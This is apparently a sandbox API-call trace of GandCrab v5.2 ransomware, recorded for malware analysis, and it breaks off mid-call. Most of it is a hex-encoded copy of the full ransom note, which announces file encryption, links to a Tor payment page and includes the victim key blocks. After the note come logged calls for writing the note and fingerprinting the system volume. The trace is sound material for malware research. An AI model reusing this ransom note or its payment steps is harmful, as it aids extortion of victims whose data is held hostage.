(lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0072.948] WriteFile (in: hFile=0x2bc, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259ed4c, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259ed4c*=0x2162, lpOverlapped=0x0) returned 1 [0072.948] CloseHandle (hObject=0x2bc) returned 1 [0072.949] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.949] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0072.949] GetSystemTime (in: lpSystemTime=0x25d0400 | out: lpSystemTime=0x25d0400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x12, wMilliseconds=0x106)) [0072.949] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0072.949] GetWindowsDirectoryW (in: lpBuffer=0x2630000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0072.949] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2630200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2630600, lpMaximumComponentLength=0x2630608, lpFileSystemFlags=0x2630604, lpFileSystemNameBuffer=0x2630400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2630600*=0xd2ca4def, lpMaximumComponentLength=0x2630608*=0xff, lpFileSystemFlags=0x2630604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0072.950] wsprintfW (in: param_1=0x25d0000, 